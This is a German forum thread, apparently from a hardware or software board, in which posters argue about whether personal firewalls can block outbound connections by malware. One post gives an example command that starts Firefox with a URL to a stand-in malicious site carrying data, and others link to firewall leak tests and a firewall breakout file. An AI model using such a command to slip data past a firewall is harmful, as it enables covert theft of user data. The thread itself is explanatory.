Wie ich schon sagte: Schadsoftware muss explizit darauf ausgelegt sind, ansonsten bewirkt sie: Gar nichts. Nun ist es wesentlich leichter eine Schadsoftware auf "Windows XP, SP2" auszulegen, was seit Jahren Millionenfach installiert wurde und jedermann bekannt ist, als auf Version 6.549.266 irgendeiner Software. Somit fallen viele Schädlinge schon durchs Raster, da sie damit nichts anzufangen wissen. Die uralten erst recht.

Und selbst dann habt ihr eines nicht bedacht: Ein Programm kann eine Sicherheitslücke haben, das heißt jedoch nicht, das diese gravierend oder ausnutzbar ist. Selbst Linux hat noch etliche und wie es dort mit Schädlingen aussieht, wissen wir alle... sollten wir zumindest!

PS: Sicherheitslücken in Drittsoftware allein reicht selten aus um die Zugriffsbeschränkungen des Systems zu umgehen.

...



Also kannst du kein Beispiel erbringen?

// Get a handle to an application window.
[DllImport("USER32.DLL")]
public static extern IntPtr FindWindow(string lpClassName,
string lpWindowName);

// Activate an application window.
[DllImport("USER32.DLL")]
public static extern bool SetForegroundWindow(IntPtr hWnd);

// Send a series of key presses to the Calculator application.
private void button1_Click(object sender, EventArgs e)
{
// Get a handle to the Calculator application. The window class
// and window name were obtained using the Spy++ tool.
IntPtr calculatorHandle = FindWindow("SciCalc", "Calculator");

// Verify that Calculator is a running process.
if (calculatorHandle == IntPtr.Zero)
{
MessageBox.Show("Calculator is not running.");
return;
}

// Make Calculator the foreground application and send it
// a set of calculations.
SetForegroundWindow(calculatorHandle);
SendKeys.SendWait("111");
SendKeys.SendWait("*");
SendKeys.SendWait("11");
SendKeys.SendWait("=");
}

...

Und selbst dann habt ihr eines nicht bedacht: Ein Programm kann eine Sicherheitslücke haben, das heißt jedoch nicht, das diese gravierend oder ausnutzbar ist. Selbst Linux hat noch etliche und wie es dort mit Schädlingen aussieht, wissen wir alle... sollten wir zumindest!
...

Die größte Sicherheitslücke ist die SOZIALE.

Beispiel: http://www.pcflank.com/pcflankleaktest.htm

Und noch jede Menge andere Tests, die inzwischen freudig von allen möglichen Botnetzteilnehmerprogrammen benutzt gibts z.B. hier:
http://www.matousec.com/projects/windows-personal-firewall-analysis/introduction-firewall-leak-testing.php
http://www.firewallleaktester.com

Ohne Probleme an allem vorbei. q.e.d.

Ich wünschte mir Aussagen zu dem oben angegeben Code von "Coda" und ich wünschte mir einen Kommentar von "The Cell". zu einem angemessenen Zeitpunkt! (Aber schön technisch!).

Der Flachargumentator (Gast), der hier technisch herausfordert, ist ja wohl eine Flachnase! Get your Informations woanders! Ich bin eh zu blöd dir zu helfen!

Der Flachargumentator (Gast), der hier technisch herausfordert, ist ja wohl eine Flachnase!

Weil du deine Argumente nicht halten kannst, haben andere keine Ahnung? Sehr weise.
Wie wäre es mit: "Was ich von mir gebe, trifft auch zu und ich kanns untermauern?"

Ich bin eh zu blöd dir zu helfen!

Dafür habe ich schließlich eine mehrjährige Ausbildung genossen. :P
Aber wir könnten einen Deal machen: Ich zahl dir 500$/h dafür, das du mir ein programm schreibst, das deine Aussagen untermauert und ich knöpf dir dann 500,10$/h dafür ab, das ich dir zeige, wozu einer ausgebildeter Netzwerktechniker mit Berufserfahrung fähig ist. Wie wärs?

Weil du deine Argumente nicht halten kannst, haben andere keine Ahnung? Sehr weise.
Wie wäre es mit: "Was ich von mir gebe, trifft auch zu und ich kanns untermauern?"



Dafür habe ich schließlich eine mehrjährige Ausbildung genossen. :P
Aber wir könnten einen Deal machen: Ich zahl dir 500$/h dafür, das du mir ein programm schreibst, das deine Aussagen untermauert und ich knöpf dir dann 500,10$/h dafür ab, das ich dir zeige, wozu einer ausgebildeter Netzwerktechniker mit Berufserfahrung fähig ist. Wie wärs?

Käme auf die Zeit an. Dollar sind allerdings nicht akzeptabel. Die sind auch ohne/wenig Zeit nichts mehr wert! €uro pwnz!

Ausbildung zu was? Feedback is welcome und ansonsten lies mal mein Listing! Eigentlich kann jeder zweite aus den Daten ein spezielles Programm schreiben!

Such mal schön! :)

Käme auf die Zeit an. Dollar sind allerdings nicht akzeptabel. Die sind auch ohne/wenig Zeit nichts mehr wert!

Ich nehm auch gern Yahoo-Aktien. ;D

Eigentlich kann jeder zweite aus den Daten ein spezielles Programm schreiben!

Wobei das ein wenig am Sinn vorbeigeht:

Wenn ich selbst ein Programm schreibe und meine Sicherheitsbedingungen kenne, so fällt es mir wesentlich diese zu umgehen... da ich weiß wo ich ansetzen muss.

Das ist bei den billigen Angriffen aus dem Netz eher selten der Fall, denn welcher hochrangige Hacker interessiert sich für DEINEN Rechner mit´n paar mp3s? Da sind es oft Massen-Schädlinge (je mehr User befallen werden, desto besser) oder "Script-Kiddies", die gar nichts können.

Wenn du an einen wirklich fähigen Mann (oder ne Frau, Bluepill lässt grüßen) gerätst, so nützt dir dein Router genauso wenig, wie dein gepatches Hochsicherheitssystem...

Da hilft nur: Ein geschlossenes System, abgekoppelt vom Netz. Da erübrigt sich nicht nur die PFW, sondern auch noch alles andere...

Ich nehm auch gern Yahoo-Aktien. ;D



Wobei das ein wenig am Sinn vorbeigeht:

Wenn ich selbst ein Programm schreibe und meine Sicherheitsbedingungen kenne, so fällt es mir wesentlich diese zu umgehen... da ich weiß wo ich ansetzen muss.

Das ist bei den billigen Angriffen aus dem Netz eher selten der Fall, denn welcher hochrangige Hacker interessiert sich für DEINEN Rechner mit´n paar mp3s? Da sind es oft Massen-Schädlinge (je mehr User befallen werden, desto besser) oder "Script-Kiddies", die gar nichts können.

Wenn du an einen wirklich fähigen Mann (oder ne Frau, Bluepill lässt grüßen) gerätst, so nützt dir dein Router genauso wenig, wie dein gepatches Hochsicherheitssystem...

Da hilft nur: Ein geschlossenes System, abgekoppelt vom Netz. Da erübrigt sich nicht nur die PFW, sondern auch noch alles andere...

Gibt es ein geschlossenes, abgekoppeltes Sys?

Gibt es ein geschlossenes, abgekoppeltes Sys?

Sicher. Ein geschlossenes Netzwerk, das nicht direkt am Internet hängt.

Man stelle sich vor, wenn Banken ...

Sicher. Ein geschlossenes Netzwerk, das nicht direkt am Internet hängt.

Man stelle sich vor, wenn Banken ...

Intranet o.ä.? Willst du mir veräppeln?

Jung, isch hab dirn Progrmmm geschriebe:

// Get a handle to an application window.
[DllImport("USER32.DLL")]
public static extern IntPtr FindWindow(string lpClassName,
string lpWindowName);

// Activate an application window.
[DllImport("USER32.DLL")]
public static extern bool SetForegroundWindow(IntPtr hWnd);

// Send a series of key presses to the Calculator application.
private void button1_Click(object sender, EventArgs e)
{
// Get a handle to the Calculator application. The window class
// and window name were obtained using the Spy++ tool.
IntPtr calculatorHandle = FindWindow("SciCalc", "Calculator");

// Verify that Calculator is a running process.
if (calculatorHandle == IntPtr.Zero)
{
MessageBox.Show("Calculator is not running.");
return;
}

// Make Calculator the foreground application and send it
// a set of calculations.
SetForegroundWindow(calculatorHandle);
SendKeys.SendWait("111");
SendKeys.SendWait("*");
SendKeys.SendWait("11");
SendKeys.SendWait("=");
}

Watt sächste dazu?

Ergo: Zonealarm Pro istne tolle Erfindung! Alles andere an Erzählungen ist Schwachmatenkram!

Dieser Thread ist geradezu ein Paradebeispiel, warum ich gegen die Möglichkeit des anonymen Postens bin (wobei die Anonymität ja zudem nur sehr relativ ist).

Weniger wegen der verbalen Ausfälle, sondern weil ein Gast auf den anderen einprügelt und kein Mensch den Hauch eines Überblicks hat, wer hier eigentlich mit wem redet.

So etwas von einem unnützen Thread ist mir schon lange nicht mehr untergekommen.

Warum geht hierauf niemand ein?

Beispiel: http://www.pcflank.com/pcflankleaktest.htm

Und noch jede Menge andere Tests, die inzwischen freudig von allen möglichen Botnetzteilnehmerprogrammen benutzt gibts z.B. hier:
http://www.matousec.com/projects/windows-personal-firewall-analysis/introduction-firewall-leak-testing.php
http://www.firewallleaktester.com

Ohne Probleme an allem vorbei. q.e.d.

Oder auf das hier?

OK, was genau bedeutet "du prüfst die Firefox.exe"? Was genau tust du dabei?

Die Frage ist ja, warum die Nachfrage der PFW erscheint. Vielleicht hat sich Firefox ein Update gezogen. Oder die PFW hat sich aktuelisiert. Oder die PFW spinnt einfach herum, denn sie ist eine Software und damit potentiell fehleranfällig.

Und abschließend noch einmal meine Frage: angenommen die Nachfrage der PFW erscheint auch nach eingehender Prüfung von Firefox.exe noch einmal. Was tust du? Um die Sache abzukürzen: du wirst dich vielleicht ein wenig wundern, aber du wirst am Ende auf "Erlauben" drücken und das war's. Und im "Worst Case" hast du damit einer Malware Zugang auf das Internet gegeben.

Damit können wir uns eigtl. alle weiteren Diskussionen sparen ...

Beispiel: http://www.pcflank.com/pcflankleaktest.htm


lässt sich sehr einfach blocken, indem man dem IE den netzzugang verbietet.
wenn der test etwas ausgereifter wäre und nach anderen installierten browsern suchen und diese verwenden würde, dann nützt das natürlich auch nichts ;)

Dieser Thread ist geradezu ein Paradebeispiel, warum ich gegen die Möglichkeit des anonymen Postens bin (wobei die Anonymität ja zudem nur sehr relativ ist).

Weniger wegen der verbalen Ausfälle, sondern weil ein Gast auf den anderen einprügelt und kein Mensch den Hauch eines Überblicks hat, wer hier eigentlich mit wem redet.

So etwas von einem unnützen Thread ist mir schon lange nicht mehr untergekommen.

:up:, aber leider hört ja auf uns keiner. :mad:

Weniger wegen der verbalen Ausfälle, sondern weil ein Gast auf den anderen einprügelt und kein Mensch den Hauch eines Überblicks hat, wer hier eigentlich mit wem redet.

Das brauchst du auch gar nicht zu wissen, da es nur die beiden Gäste betraf.

Damit können wir uns eigtl. alle weiteren Diskussionen sparen ...

Nein, da machst du es dir sehr einfach. Zu einfach.
Außerdem steht die Antwort bereits hier: Damit kann er nichts bewirken.

:up:, aber leider hört ja auf uns keiner. :mad:

Ich wäre für die komplette Abschaffung von Membern. Deren Beitragsqualität ist zum großen Teil niedriger, inbesondere die, einiger bestimmte User.

Das brauchst du auch gar nicht zu wissen, da es nur die beiden Gäste betraf.

Höflichkeit ist bei einigen Menschen wohl ein Fremdwort.

Richtig, ich bin hier auch nur Gast. Aber ich stelle mich wenigstens virtuell vor.

Das geht übrigens auch ohne Anmeldung.

lässt sich sehr einfach blocken, indem man dem IE den netzzugang verbietet.
wenn der test etwas ausgereifter wäre und nach anderen installierten browsern suchen und diese verwenden würde, dann nützt das natürlich auch nichts ;)

Dieser Test dient (logischerweise) nur als Beispiel, um das Prinzip der unbemerkten Datenübertragung zu verdeutlichen! Eine potentiell gefährliche Software würde sich natürlich nicht nur auf den IE beschränken. Mal davon abgesehen, dass sicher die wenigsten den IE von ihrer PFW blocken lassen, auch wenn sie eigtl. einen anderen Browser nutzen ...

Höflichkeit ist bei einigen Menschen wohl ein Fremdwort.Ich weiß nicht ob das höfflich oder freundlich ist wenn man dauernd seine kleinen Grabenkriege gegen alle Gäste führt, nur weil man einigen wenigen von ihnen argumentativ immer unterlegen ist.
Wurmt das denn wirklich so?

Das schöne an der eigenen Nase ist, sie ist immer sehr gut erreichbar.

Ich weiß nicht ob das höfflich oder freundlich ist wenn man dauernd seine kleinen Grabenkriege gegen alle Gäste führt, nur weil man einigen wenigen von ihnen argumentativ immer unterlegen ist.
Wurmt das denn wirklich so?

Das schöne an der eigenen Nase ist, sie ist immer sehr gut erreichbar.

Nachdem Dein erster Beitrag schon getrasht worden ist, versuchen wirs einfach nochmal mich aus der Reserve zu locken, wie? :) Nachdem es schon beim ersten mal nicht geklappt hat.

Manche lernen es halt nie.

"Unterlegen" ist in einer Diskussion sowieso völliger quatsch. Man kann bestenfalls von seinem Gegenüber argumentativ widerlegt werden. Wenn mir das passiert, bin ich der letzte, der es nicht zugibt.

Aber da die Gäste hier ja absolut uniform auftreten, wüsste ich noch nicht mal welcher "Gast" mich auf diese Weise widerlegt haben sollte. Jedenfalls gibt es in diesem Thread nicht ein Posting, in dem meine Meinung faktisch widerlegt wird. Lediglich Behauptungen - und auf meine Bitte nach eine Belegung und einer Quelle dann tiefes Schweigen.

Behaupten kann man ja viel so lange der Tag lang ist, gell?

Wie unterscheidet denn die PW wie der Browser gestartet wurde?

Inter-Prozess-Kommunikation belauschen?
Der Nuhr hat ja mal gesagt...

Inter-Prozess-Kommunikation belauschen?
Der Nuhr hat ja mal gesagt...

Aber klar doch... Am besten klinken wir uns in jede Message-Queue ein. Sonst noch Vorschläge?

Weißt Du überhaupt über welche Wege Prozesse miteinander kommunizieren können? Da gibts ja doch einige:

- Pipes
- Dateien
- Shared Memory
- Sockets
- RPC
- DDE
- Windows Messages
- Programmstart mit Parametern

Und sicher noch ein paar Wege, an die ich im Moment nicht denke...

@Gast:

Wie schützt Duch dich gegen einen Aufruf von

C:\Programme\Firefox\firefox.exe http://www.boeseWebseite.com/boesesScript.php?VieleVieleBunteDaten

So etwas kann keine Firewall abfangen. Wie auch.

Meine schon, du Nixblicker:
"Ein versteckter Prozess...."
Outpost pro

Aber klar doch... Am besten klinken wir uns in jede Message-Queue ein. Sonst noch Vorschläge?

Weißt Du überhaupt über welche Wege Prozesse miteinander kommunizieren können? Da gibts ja doch einige:

- Pipes
- Dateien
- Shared Memory
- Sockets
- RPC
- DDE
- Windows Messages
- Programmstart mit Parametern

Und sicher noch ein paar Wege, an die ich im Moment nicht denke...

Blablabla

Meine PFW unterscheidet z.B., ob ich im SpeedCommander o. in The Bat! einen Link anklicke!
Was sagt Deine Weisheit dazu?
Und Deine Kommando-Zeile wird auch entdeckt! Oh mein Gtt, eine PFW kann doch mehr als gar keine!

Meine schon, du Nixblicker:
"Ein versteckter Prozess...."
Outpost pro

Tolle Werbeslogans... :)

Vorallem dieser hier "Bulletproof self-defense"

Wenn jemand das Programm genau untersucht, dann kann er es auch aushebeln. Wer etwas anderes denkt, der ist naiv.

Was genau funktioniert denn diese tolle "Preemptive threat protection"? Steht ja leider nichts genaues da. Wird jeder Call über einen Shell-Start überwacht? Oder nur von bestimmten Programmen? Wie wird das gemacht? Welche Systemroutinen werden dabei gepatcht um das zu erreichen?

Ich würde NIEMALS IM LEBEN ein solch invasives Tool auf meinen Rechner loslassen. Wer das tut, dem ist ernsthaft nicht mehr zu helfen! Man braucht sich dann jedenfalls nicht zu wundern, wenn nichts mehr so richtig funktioniert.

Blablabla

Meine PFW unterscheidet z.B., ob ich im SpeedCommander o. in The Bat! einen Link anklicke!
Was sagt Deine Weisheit dazu?
Und Deine Kommando-Zeile wird auch entdeckt! Oh mein Gtt, eine PFW kann doch mehr als gar keine!

Weisheit ist relativ. Es gibt jede Menge Dinge, von denen ich keine Ahnung habe, und jede Menge davon am PC.

Aber ein paar Dinge weiß ich schon. Z.B. dass ICH bestimmt kein Tool auf mein System loslasse, das versucht in ganz normale Betriebsabläufe einzugreifen. Und ein Start eines Programms mit Parametern ist nun mal ein völlig normaler Vorgang.

Was Du hier in den letzten Postings abgeliefert hast, ist schon extrem arm. Du bist nur am beleidigen. Was ist los, kommst Du anders nicht klar?

Und dabei hatte ich Dich mal in der Credits-Liste von nHancer. Wie man sich in Leuten täuschen kann.

Es tut mir für Dich leid, wenn Du Dir nicht anders zu helfen weißt um Deinem Selbstwertgefühl auf die Sprünge zu helfen... Viel Spaß noch! :)

Weisheit ist relativ. Es gibt jede Menge Dinge, von denen ich keine Ahnung habe, und jede Menge davon am PC.

Aber ein paar Dinge weiß ich schon. Z.B. dass ICH bestimmt kein Tool auf mein System loslasse, das versucht in ganz normale Betriebsabläufe einzugreifen. Und ein Start eines Programms mit Parametern ist nun mal ein völlig normaler Vorgang.

Was Du hier in den letzten Postings abgeliefert hast, ist schon extrem arm. Du bist nur am beleidigen. Was ist los, kommst Du anders nicht klar?

Und dabei hatte ich Dich mal in der Credits-Liste von nHancer. Wie man sich in Leuten täuschen kann.

Es tut mir für Dich leid, wenn Du Dir nicht anders zu helfen weißt um Deinem Selbstwertgefühl auf die Sprünge zu helfen... Viel Spaß noch! :)

Mag nur die Selbstgefälligkeit nicht, mit der PFW-Benutzer runtergemacht werden.
Da kommen dann ärmliche Kommando-Zeilen, die schon seit Jahren abgefangen, als ob PFW-Programmierer Abzocker o. Vollhonks wären.
Da wird nicht mal selbst getestet, sondern erstmal gelabert.

Ich persönlich habe etwa 20 Privat-PCs dank PFW vor Blaster u. Co. geschützt.

Allein deshalb hat sich für mich der Einsatz einer kostenlosen PFW gelohnt, mögen sie noch so viel unken...

btw: Täuschen konntest DU Dich gar nicht, wir kennen uns ja überhaupt nicht.

Mag nur die Selbstgefälligkeit nicht, mit der PFW-Benutzer runtergemacht werden.
Da kommen dann ärmliche Kommando-Zeilen, die schon seit Jahren abgefangen, als ob PFW-Programmierer Abzocker o. Vollhonks wären.
Da wird nicht mal selbst getestet, sondern erstmal gelabert.

1. Eine PFW ist besser als ein direkter, offener Zugang ins Netz.
2. Es gibt auch Fälle in denen eine invasive Schutzsoftware (ist dann eigentlich keine Firewall mehr) vor Schaden bewahren kann.

So weit gebe ich Dir Recht. Aber:

1. Die im System integrierte FW und/oder ein NAT Router schützt vor IP-Angriffen von außen vollkommen. Diese Maßnahmen können aber nicht gegen Programme schützen, die sich über Lücken in vorhandener Software oder über den Anwender ins System einschleusen.

2. Wenn ein Schadprogramm aber erst mal auf dem eigenen System LÄUFT dann hat man prinzipiell verloren. Speziell dann, wenn es diesem Programm gelingt, Adminrechte zu erlangen. Ob dann eine Schutzsoftware noch schützt hängt nur davon ab, ob der Programmierer der Schadsoftware die Schutzsoftware kennt und umgangen hat.

3. Wer sich auf eine solche Schutz-SW verlässt, der gibt sich deswegen einer trügerischen Sicherheit hin.

4. Jedes dieser Tools verursacht Probleme. Es ist Software. Software hat Fehler. Es können sogar weitere Sicherheitlücken ins System gelangen. Zumindest gibt es aber mit höchster Wahrscheinlichkeit Probleme mit irgendwelcher anderer SW oder sogar im normalen Betrieb.

Also, Leute die diese Meinung vertreten sind nicht mehr oder weniger selbstgerecht wie Du. Sie vertreten lediglich eine Meinung. Und genau wie Du, sind sie von ihrer Meinung überzeugt.

Was auf jeden Fall gar nicht geht ist den anderen so anzugreifen, wie Du das machst. Unterste Schublade ist das.

Mag nur die Selbstgefälligkeit nicht, mit der PFW-Benutzer runtergemacht werden.
Da kommen dann ärmliche Kommando-Zeilen, die schon seit Jahren abgefangen, als ob PFW-Programmierer Abzocker o. Vollhonks wären.
Da wird nicht mal selbst getestet, sondern erstmal gelabert.

Ich persönlich habe etwa 20 Privat-PCs dank PFW vor Blaster u. Co. geschützt.

Allein deshalb hat sich für mich der Einsatz einer kostenlosen PFW gelohnt, mögen sie noch so viel unken...

btw: Täuschen konntest DU Dich gar nicht, wir kennen uns ja überhaupt nicht.

Ich persönlich habe etwa 20 Privat-PCs dank intelligentem Verhaltem im Internet vor Blaster u. Co. geschützt.

Allein deshalb hat sich für mich der Einsatz von intelligentem Verhaltem im Internet gelohnt, mögen sie noch so viel unken...

Schwups das wars mit deiner Outpostfirewall: http://www.dingens.org/breakout-en.c

Und nochmal: Wer meint solche Lücken werden nicht ausgenutzt, der irrt unglaublich. Sehr viele Würmer tun das inzwischen, und zwar individuell auf die dementsprechend installierte Firewall.

Mag nur die Selbstgefälligkeit nicht, mit der PFW-Benutzer runtergemacht werden.
Da kommen dann ärmliche Kommando-Zeilen, die schon seit Jahren abgefangen, als ob PFW-Programmierer Abzocker o. Vollhonks wären.
Da wird nicht mal selbst getestet, sondern erstmal gelabert.

Ich persönlich habe etwa 20 Privat-PCs dank PFW vor Blaster u. Co. geschützt.

Allein deshalb hat sich für mich der Einsatz einer kostenlosen PFW gelohnt, mögen sie noch so viel unken...

btw: Täuschen konntest DU Dich gar nicht, wir kennen uns ja überhaupt nicht.
Grestorn hat Recht. Personal Firewalls geben per-se eine trügerische Sicherheit. Sobald ein Schadprogram Adminrechte hat kann es alles machen, egal mit oder ohne. Braucht sich nur nen Internet-Explorer-Control einbetten und wild damit im Web surfen. Das kann die PFW nicht von jedem anderen IE-Client unterscheiden. Unmöglich.

Gegen Blaster und Konsorten hilft auch einfaches Port-Filtering mit der Standard-Windows-Firewall, dafür brauch ich keine PFW. Die Dinger sind unnütz wie ein Kropf. Das einzige was gegen Malware wirklich hilft ist ein Virenscanner der sie daran hindert überhaupt ausgeführt wird.

Grestorn hat Recht. Personal Firewalls geben per-se eine trügerische Sicherheit. Sobald ein Schadprogram Adminrechte hat kann es alles machen, egal mit oder ohne.

Dafür muss das Schadprogramm erstmal auf den Rechner kommen und das verhinderst du bereits mit sehr ohne Wahrscheinlichkeit durch eben diese Software...

> Unnütze Diskussion.

Blaster wurde zu 100 % von einer PFW geblockt. Er richtete trotzdem großen Schaden an, weil er direkt an die Windowslücke kam. Denkt mal darüber nach, denn Microsoft hat nicht "rein zufällig" diese im SP2 integriert.

blaster hat gar keinen schaden angerichtet sondern lediglich einen kurzfristigen ausfall verursacht.

Dafür muss das Schadprogramm erstmal auf den Rechner kommen und das verhinderst du bereits mit sehr ohne Wahrscheinlichkeit durch eben diese Software...
Dann reicht auch eine normale ingoing Firewall + Viren-/Malwarescanner. Weit effektiver. Firewall-Software die je nach Program Outgoing blocken soll ist schlicht und einfach unwirksam gegen wirklich böse Schadsoftware.

Blaster wurde zu 100 % von einer PFW geblockt. Er richtete trotzdem großen Schaden an, weil er direkt an die Windowslücke kam. Denkt mal darüber nach, denn Microsoft hat nicht "rein zufällig" diese im SP2 integriert.
Blaster wird auch durch eine stinknormale Firewall geblockt.

Ich sage ja nicht, dass eine Firewall Blödsinn ist, ich sage nur, dass Outgoing-Blocking je nach App nicht funktionieren kann ("Personal Firewall"). So wie Windows funktioniert kann ein Programm, dass mit Admin-Rechten läuft z.B. die komplette Benutzereingabe auf der GUI-Ebene übernehmen und damit z.B. schlicht und einfach im Konfigurationsmenü die jeweilige Firewall abschalten oder noch extremer einfach einen Kernel-Treiber installieren (gut auf Vista nicht mehr wegen der Signierung).

Dann reicht auch eine normale ingoing Firewall + Viren-/Malwarescanner. Weit effektiver.

Was unterscheidet die Win FW von ZoneAlarm/Outpost etc?
Warum soll der User schlecht damit fahren, wenn er die WinFW deaktiviert und eine erweiterte Software nutzt? Die laufen ja nicht beide gleichzeitig.

Außerdem hast du vergessen, das dein Tipp nicht funktioniert. Habe schonal kein Router, toll nicht?

Warum soll der User schlecht damit fahren, wenn er die WinFW deaktiviert und eine erweiterte Software nutzt? Die laufen ja nicht beide gleichzeitig.

Weil, z.B.
- Eine PFW bremst das System mehr aus, als ein simpler Paketfilter, der vollkommen ausreichend ist
- Damit eine PFW alle "Outgoing-Tricks" erkennt (was eh nie möglich sein wird) muss sie Windows überall mit reinpfuschen, ich habe da als Anwender selber keine Kontrolle mehr (bei einem Paketfilter hab ich die)
- Durch nervige Popups wird dem Anwender eine falsche Sicherheit vorgegaukelt
- Eine PFW erhöht die Codemenge auf dem PC nicht unwesentlich
- Unerfahrene Nutzer keine Ahung haben was sie blocken müssen/sollen/wollen. "evil.exe versucht iexplorer.exe zu starten und eine Verbindung ins Internet aufzubauen" (daneben ein Icon vom IE) - sehr sinnvoll, da klickt jeder auf Zulassen.

Was unterscheidet die Win FW von ZoneAlarm/Outpost etc?
Warum soll der User schlecht damit fahren, wenn er die WinFW deaktiviert und eine erweiterte Software nutzt? Die laufen ja nicht beide gleichzeitig.

beispielsweise weil das ganze wesentlich mehr ressourcen braucht?

eine zusätzliche FW ist nicht unbedingt schlechter, aber bringt gegenüber der integrierten windows-FW auch nicht wirklich was und ist damit überflüssig.

Ich persönlich habe etwa 20 Privat-PCs dank intelligentem Verhaltem im Internet vor Blaster u. Co. geschützt.

Allein deshalb hat sich für mich der Einsatz von intelligentem Verhaltem im Internet gelohnt, mögen sie noch so viel unken...

Schwups das wars mit deiner Outpostfirewall: http://www.dingens.org/breakout-en.c

Und nochmal: Wer meint solche Lücken werden nicht ausgenutzt, der irrt unglaublich. Sehr viele Würmer tun das inzwischen, und zwar individuell auf die dementsprechend installierte Firewall.

Ich von diesen 20 19 nicht mit "Brain" schützen, da sie nicht mir gehören.

beispielsweise weil das ganze wesentlich mehr ressourcen braucht?

eine zusätzliche FW ist nicht unbedingt schlechter, aber bringt gegenüber der integrierten windows-FW auch nicht wirklich was und ist damit überflüssig.

Hab 3 Progs im Tray. Mein Windows braucht 90 MByte beim Start. 0 Problem.

Dann reicht auch eine normale ingoing Firewall + Viren-/Malwarescanner. Weit effektiver. Firewall-Software die je nach Program Outgoing blocken soll ist schlicht und einfach unwirksam gegen wirklich böse Schadsoftware.


Blaster wird auch durch eine stinknormale Firewall geblockt.

Ich sage ja nicht, dass eine Firewall Blödsinn ist, ich sage nur, dass Outgoing-Blocking je nach App nicht funktionieren kann ("Personal Firewall"). So wie Windows funktioniert kann ein Programm, dass mit Admin-Rechten läuft z.B. die komplette Benutzereingabe auf der GUI-Ebene übernehmen und damit z.B. schlicht und einfach im Konfigurationsmenü die jeweilige Firewall abschalten oder noch extremer einfach einen Kernel-Treiber installieren (gut auf Vista nicht mehr wegen der Signierung).

Also Gredings Kommando-Zeile u. einiges anderes wird schon geblockt, zusätzlich läuft noch Avira u. NoScript.

Also Gredings Kommando-Zeile u. einiges anderes wird schon geblockt, zusätzlich läuft noch Avira u. NoScript.

Sprich der Rechner ist nahe daran unbenutzbar zu sein.

Blos gut dass ich nicht dazu gezwungen bin, an Rechnern zu arbeiten, die von Dir administriert werden. Wäre für mich ein Kündigungsgrund.

Das mit meinem Namen üben wir nochmal. Irgendwann kriegst Du's dann auch hin.

wollt nur nochmal erwähnen dass closed ports als sicherheitsstufe sicherer sind als stealth...

stealth heisst nämlich für nen angreifer, uiiii da versteckt sich was.

das kann interessanter sein wie closed.

Weil, z.B.
- Eine PFW bremst das System mehr aus, als ein simpler Paketfilter, der vollkommen ausreichend ist

Ist bei mir definitiv nicht so. Vielleicht auf dem 286er vom Nachbarn.

- Durch nervige Popups wird dem Anwender eine falsche Sicherheit vorgegaukelt

Dann schalt sie doch einfach ab die Meldungen!? Die werden doch eh nur auf Wunsch eingeblendet.
Du kannst auch schon vorher alle Programme selbst festlegen und alle anderen generell sperren > Nie mehr Popups.

Eine PFW erhöht die Codemenge auf dem PC nicht unwesentlich

Über diese Aussage muss ich mich doch sehr wundern:

Die Codemenge erhöht sich auch bei Einsatz der Win FW oder einem Paketfilter...

Außerdem solltest du die Frage stellen, was im Endeffekt besser ist:
Wenn ein Schadprogramm von außen an dutzende (!) Lücken im gesamten System herankommt (sei es nun IE, Win Explorer, Paint, WordPad, Media Player...). oder wenn es doch *nur* die PFW ist.
Mir ist letzteres tausend mal lieber! Denn deine installierten Progs sind davon auch betroffen und das können dutzende sind, mit genauso vielen Sicherheitslücken.

wollt nur nochmal erwähnen dass closed ports als sicherheitsstufe sicherer sind als stealth...

stealth heisst nämlich für nen angreifer, uiiii da versteckt sich was.

Berücksichtigen wir aber mal die Praxis:
Alle Ports schließen geht nicht wirklich, da dann gar nichts mehr funktioniert. Und wer von den 0815-Usern hat Bock oder die nötigen Kenntnisse (es scheitert schon beim einrichten einer noch einfacher gestrickten FW) die nötigen Ports freizugeben? Frag mal die Hausfrau von nebenan, was ein Port ist. Die wird dir was husten. ;D

Also ist also nicht praxistauglich, wenn ich sehe, wievielen es nicht mal gelingt, einen ICQ-Transfer zu erlauben. ;D

wollt nur nochmal erwähnen dass closed ports als sicherheitsstufe sicherer sind als stealth...


nicht wirklich, closed ist "nur" geschlossen, stealth heißt unsichtbar.

Also Gredings Kommando-Zeile u. einiges anderes wird schon geblockt, zusätzlich läuft noch Avira u. NoScript.
Nix Kommandozeile. Du kannst Outgoing von einem Admin-Programm nicht verhindern, außer du blockst alle Programme die irgendwie Daten verschicken könnten. Ein Programm kann unter Windows exakt das machen was ein User mit gleichen Rechten auch machen kann. Per Design - Globaler Eventstack usw.

Und wer die Kommandozeile komplett deaktivieren muss um Sicherheit auf seinen Systemen zu erreichen hat was nicht verstanden.

Die Codemenge erhöht sich auch bei Einsatz der Win FW oder einem Paketfilter...
Ein einfacher Paketfilter ist nichtmal 1/10 des Codes was eine PFW für Klimmzüge machen muss um zu "filtern" was sie angibt machen zu wollen.

Das primäre Einfallstor für Schadsoftware ist eh der IE und Office. Und dagegen hilft nur irgend ein Scanner. Wenn die PFW sowas enthält ist das ja schonmal lobenswert, aber der Outgoing-Teil ist einfach nur Plazebo.

[QUOTE=Coda;6299545
Ein einfacher Paketfilter ist nichtmal 1/10 des Codes was eine PFW für Klimmzüge machen muss um zu "filtern" was sie angibt machen zu wollen.[/QUOTE]

Dafür hängt noch das ganze Betriebssystem hinten dran. ;D

Zudem bleiben die Fakten: Wer kann das Zeug richtig bedienen? Der 0815-User jedenfalls nicht.

Nix Kommandozeile. Du kannst Outgoing von einem Admin-Programm nicht verhindern, außer du blockst alle Programme die irgendwie Daten verschicken könnten. Ein Programm kann unter Windows exakt das machen was ein User mit gleichen Rechten auch machen kann. Per Design - Globaler Eventstack usw.

Und wer die Kommandozeile komplett deaktivieren muss um Sicherheit auf seinen Systemen zu erreichen hat was nicht verstanden.


Ein einfacher Paketfilter ist nichtmal 1/10 des Codes was eine PFW für Klimmzüge machen muss um zu "filtern" was sie angibt machen zu wollen.

Das primäre Einfallstor für Schadsoftware ist eh der IE und Office. Und dagegen hilft nur irgend ein Scanner. Wenn die PFW sowas enthält ist das ja schonmal lobenswert, aber der Outgoing-Teil ist einfach nur Plazebo.

Fakt ist, dieser hier im geposteten shell-Befehle werden abgefangen, obwohl sie das ja gar nicht können sollten.

Und ja: Grundsätzlich ist immer allem verboten, ins Netz zu gehen, ausser wenigen Ausnahmen.